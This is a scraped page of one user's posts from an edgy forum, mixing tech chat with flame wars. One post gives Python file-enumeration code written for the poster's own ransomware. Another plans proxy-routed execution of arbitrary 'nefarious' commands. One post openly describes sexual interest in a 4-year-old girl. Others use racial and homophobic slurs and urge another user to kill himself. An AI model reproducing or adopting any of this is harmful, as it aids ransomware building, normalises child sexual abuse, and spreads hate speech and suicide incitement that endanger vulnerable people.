User Controls

  1. 1
  2. 2
  3. 3
  4. ...
  5. 1156
  6. 1157
  7. 1158
  8. 1159
  9. 1160
  10. 1161
  11. ...
  12. 1426
  13. 1427
  14. 1428
  15. 1429

Posts by Sophie

  1. Sophie Pedophile Tech Support
    What was your handle on Totse/Zoklet? I'll show you mine if you show me yours.
  2. Sophie Pedophile Tech Support
    I think you'd want something like a new class NefariousThings, initialization should take a proxy object and prep the bull connection - would be a socket or something. Then a function which actually executes whatever it is you want to execute and forwards it through your proxy. Not sure how to make that really flexible, as in how to execute an sh script and have everything be routed through the proxy. You could of course change the routing on the os or use a virtual machine, but that seems like overkill. You already made get_proxy a class so regardless of how you handle the next step you might as well have it utilize the proxy object.

    Good point, i actually want a new proxy selected at random each time the script is run, maybe i could chain a couple at random as well but that will require some additional coding. And nah, i won't be changing the routing on the OS that's a bit too much as you say.
  3. Sophie Pedophile Tech Support
    I'm trying to get a bit more into web dev for security and development purposes and i've been planning on making a web based game for a while now and a website as well. Basically i got the tools and some know how. Not as much as you of course since as you know i'm into sec related programming not web development, but i'd love to try my hand at a website to showcase some infosec projects web based games and general tech stuff. Now i was wondering if you could trade me a subdomain and/or some server space in exchange for me doing some maintenance on the forum for you. Fixing some common problems, you know mundane tasks that you don't feel like doing, implementing user requested features stuff like that, i'll even brush up on JS, PHP and HTML if that's what it would take. i don't even want mod or admin powers. The only access i need would be an account for the file server. And we could even set up a separate database for the subdomain so that everyone's PI would be safe from me. I basically need a couple pages and some server space as sandbox to try some things out.

    And i promise you i will not compromise your safety by hosting illegal materials should you accept my proposition. If you would be so kind as to consider it i'd be much obliged. Thanks fam
  4. Sophie Pedophile Tech Support
    Go to the interview high on meth and be like "I HERD YALL WAS LOOKING FOR INDIVIDUALS WITH HIGH ENERGY, WELL LOOK NO FURTHER SIR BECAUSE I HAVENT SLEPT IN A WEEK AND IM READY TO WORK RIGHT NOW!!!!, NOW ARE YOU GONNA SIT HERE LIKE A FUCKBOI OR ARE YOU GONNA SHOW THISmy favorite little princess HOW TO RUN THE CASH REGISTER OR WHAT?!"

    and wear this shirt with blood and cum stains.


    I love DFC.
  5. Sophie Pedophile Tech Support
    Import from EU. Knives are pretty cheap here. Wholesaler would be your best bet.
  6. Sophie Pedophile Tech Support
    This, ladies and gentlemen, is what total defeat looks like. Haha.

    If it were a contest on who the biggest asshole is sure i admit defeat you take the cake asshole. You have absolutely no clue on how sexuality works. You're an idiot that sells leather jackets you got off ebay LMAO, good job bro, nice skills, takes real smarts that does. Did you even go to fucking college? I have a degree in engineering faggot and you have the audacity to call me mentally underdeveloped? And yeah, i'm mad, let's say for arguments sake you were gay and i were to tell you : Well being gay is just a mental disorder, that particularly manifests itself among the mentally underdeveloped. You'd be angry as well.

    [greentext]>tell me how you think a relationship between you and a 4 YEAR OLD GIRL would be like[/greentext]

    Paternal, caring and sexual on her terms.

    Also i hold no illusions of 4yo girls being sexually attracted to 26yo guys. Non exclusive pedophilia is just my sexual orientation. Just like you can't do anything about the fact you like 21yo girls with big tits and ass, i can't help what i like. So fuck you RisiR. Fuck you.
  7. Sophie Pedophile Tech Support
    Apparently the endswith() method only takes three arguments so i could for instance enumerate all docx files like so:


    import os, sys

    for root, dirs, files in os.walk("/"):
    for file in files:
    if file.endswith(".docx"):
    print(os.path.join(root, file))


    Which is fine if all i want to do is encrypt docx files but it's not what i want of course within the context of the program.

    However i am able to enumerate all the files i want if i use a tuple instead like so:



    import os, sys


    ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
    ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
    ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
    ".jpg",".jpeg",".png", ".tiff", ".zip", ".7z", ".exe",
    ".tar.gz", "tar", ".mp3", ".sh", ".c", ".h"]

    files_to_enc = []
    for root, dirs, files in os.walk("/"):
    for file in files:
    if file.endswith(tuple(ext)):
    print(os.path.join(root, file))


    Run that, i've tested it and it works.


    Here's a sample of the result if i run this little snippet on my rig.

    /usr/src/linux-headers-4.2.0-36-generic/scripts/kconfig/merge_config.sh
    /usr/src/linux-headers-4.2.0-36-generic/scripts/kconfig/confdata.c
    /usr/src/linux-headers-4.2.0-36-generic/scripts/kconfig/images.c
    /usr/src/linux-headers-4.2.0-36-generic/scripts/kconfig/expr.c
    /usr/src/linux-headers-4.2.0-36-generic/scripts/kconfig/lxdialog/checklist.c
    /usr/src/linux-headers-4.2.0-36-generic/scripts/kconfig/lxdialog/menubox.c
    /usr/src/linux-headers-4.2.0-36-generic/scripts/kconfig/lxdialog/dialog.h
    /usr/src/linux-headers-4.2.0-36-generic/scripts/kconfig/lxdialog/util.c
    /usr/src/linux-headers-4.2.0-36-generic/scripts/kconfig/lxdialog/inputbox.c
    /usr/src/linux-headers-4.2.0-36-generic/scripts/kconfig/lxdialog/check-lxdialog.sh
    /usr/src/linux-headers-4.2.0-36-generic/scripts/kconfig/lxdialog/yesno.c
    /usr/src/linux-headers-4.2.0-36-generic/scripts/kconfig/lxdialog/textbox.c
    /usr/src/linux-headers-4.2.0-36-generic/scripts/selinux/install_policy.sh
    /usr/src/linux-headers-4.2.0-36-generic/scripts/selinux/mdp/mdp.c
    /usr/src/linux-headers-4.2.0-36-generic/scripts/selinux/genheaders/genheaders.c
    /usr/src/linux-headers-4.2.0-36-generic/scripts/genksyms/parse.tab.h
    /usr/src/linux-headers-4.2.0-36-generic/scripts/genksyms/keywords.hash.c
    /usr/src/linux-headers-4.2.0-36-generic/scripts/genksyms/genksyms.h
    /usr/src/linux-headers-4.2.0-36-generic/scripts/genksyms/parse.tab.c
    /usr/src/linux-headers-4.2.0-36-generic/scripts/genksyms/genksyms.c
    /usr/src/linux-headers-4.2.0-36-generic/scripts/genksyms/lex.lex.c
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/tools/calc_run_size.sh
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/purgatory/kexec-purgatory.c
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/include/generated/uapi/asm/unistd_32.h
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/include/generated/uapi/asm/unistd_64.h
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/include/generated/uapi/asm/unistd_x32.h
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/include/generated/asm/dma-contiguous.h
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/include/generated/asm/mm-arch-hooks.h
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/include/generated/asm/syscalls_64.h
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/include/generated/asm/unistd_32_ia32.h
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/include/generated/asm/unistd_64_x32.h
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/include/generated/asm/early_ioremap.h
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/include/generated/asm/clkdev.h
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/include/generated/asm/mcs_spinlock.h
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/include/generated/asm/xen-hypercalls.h
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/include/generated/asm/cputime.h
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/include/generated/asm/syscalls_32.h
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/entry/syscalls/syscallhdr.sh
    /usr/src/linux-headers-4.2.0-36-generic/arch/x86/entry/syscalls/syscalltbl.sh
    /usr/src/volatility-tools/linux/module.c
    /usr/src/volatility-tools/linux/kcore/elf.h
    /usr/src/volatility-tools/linux/kcore/getkcore.h
    /usr/src/volatility-tools/linux/kcore/getkcore.c


    Thought you might be interested :) And i have updated Cypher(my ransomware accordingly.)
  8. Sophie Pedophile Tech Support
    But are you ready to kill yourself yet?

    What does that have to do with anything? And why would i want to do that, i rather enjoy being alive, besides i can't call you out on your bullshit when i'm dead.
  9. Sophie Pedophile Tech Support
    I think he's trying to troll you sophie. What language is that BTW? I'm curious.

    Python 2.7. And yeah he's probably trolling i just can't stand spectral.
  10. Sophie Pedophile Tech Support
    C'mon, now.

    Yeah i'd say that too if i knew Sophie was right.
  11. Sophie Pedophile Tech Support
    You're supposed to be oh-so-knowledgeable, but all you really do is ask stuff every five minutes. Can't you figure this stuff out on your own, or do you just feel the overwhelming need to show off, seven times a week?

    You're just pissed you can't read a single line of code i posted. I never pretended to be an expert like you and learning new things is something you do if you want to stay ahead. Also, there's a significant difference between the threads i post and " LOL HOW I HACK FACEBOOK" threads. This alone should tell you something about my skill level. Smart people ask questions, idiots just pretend they know things. Also, every five minutes, lol nigger this is the only programming related question i posted that's on the first page of T&T. Also, unlike Lanny and Aldra, i don't have an official education in computer science. I'm an engineer, all compsci things i know i taught myself.

    Also, if you are oh-so-knowledgeable, you'd have posted the solution already instead of acting like a little kid stomping your feet and making barely coherent accusations.
  12. Sophie Pedophile Tech Support
    Fuck that really rustles my jimmies. I have fantasies of getting rich and hiring epic Russian hackers and anonymous psyop agents to infiltrate that place and take it down for good. Fuck their dumb little community of idiots. They all pay $10 so they are too afraid to speak about anything or else they wasted their money.. Fuck their charity drives and dumb bullshit, I wish them nothing but despair and poverty.

    With all the money they get from people buying accounts i imagine they can afford pretty decent security.
  13. Sophie Pedophile Tech Support
    Gotcha big boy. Your insecurity regarding your intellect is truly your weak point.

    You aren't fully developed mentally. You are a pedophile. I know you don't understand that because you spend so much time with other pedo faggots but you are a retard. It's ok to like little girls when you're a little boy but when you develop mentally you lose interest in them. You are basically the sexual equivalent of a 26 year old who paints with finger paint and chalk and smashes action hero figures together in a wild fight. A part of your brain never grew up, is underdeveloped. Idiot.

    You may know a thing about computers and basic physics but you are a retard. Truly not on par with your peers.

    PS: Suicide is an absolutely valid solution to everything. It literally fixes all your problems just like that.

    Said the guy who admitted to me in PM he likes 14yo girls too. Also cry harder and just go ahead and kill yourself. Poor you...

    "Waahh waah, my life sucks, i'mma kill myself"

    -RisiR

    Do the world a favor and just do it faggot.
  14. Sophie Pedophile Tech Support
    What is a cript

    A typo.
  15. Sophie Pedophile Tech Support
    also I'm writing a proper response not just shitposting

    Well ok then.
  16. Sophie Pedophile Tech Support
    Or this one. I cri evry teim.

  17. Sophie Pedophile Tech Support
    Saddest song ever? Disagree. Why? Because it's just…not the saddest song ever. Not by a space mile. Most of the saddest songs to me are instrumentals. There isn't one song that stands out to me as SADDEST EVER. I guess if I HAD to say one, it would be entirely subjective as it relates to the death of my dad and one of the two songs he wanted played at his funeral. It's called Sung to Sleep, by Michael Manring. I've bawled my eyes out to it many a time, but only because of it's relation to my dad. Aside from that I probably wouldn't think much of it other than just a nice little peaceful song.


    Very beautiful, i think you'll like this one too.

  18. Sophie Pedophile Tech Support
    Haha! The usertitle algorithm is a carefully guarded secret. It actually reduces to a polynomial time solution to 3-partition, when you understand its efficient implementation you'll have proven P=NP and then god only knows what will happen next.

    [greentext]> you'll have proven P=NP[/greentext]

    Impressive.
  19. Sophie Pedophile Tech Support
    iktfb, although I'm only ever back in my "hometown" when something shitty happens or part of my family dies so it's been getting progressively shittier, darker and more depressing in my mind. I don't think I'll make it to the last funeral I'm alive for, god I hope when I die someone has the good sense not to drag my corpse back there. It's enough to make me want to shoot myself in the back seat of a car as one of those car-crusher things is about to smash me into a cute metal block or some shit.

    A cute Lanny block (n_n")
  20. Sophie Pedophile Tech Support
    I legitimately think I cured or lessened my autism through chemicals.

    Call some researchers in the field see how they think about that.
  1. 1
  2. 2
  3. 3
  4. ...
  5. 1156
  6. 1157
  7. 1158
  8. 1159
  9. 1160
  10. 1161
  11. ...
  12. 1426
  13. 1427
  14. 1428
  15. 1429
Jump to Top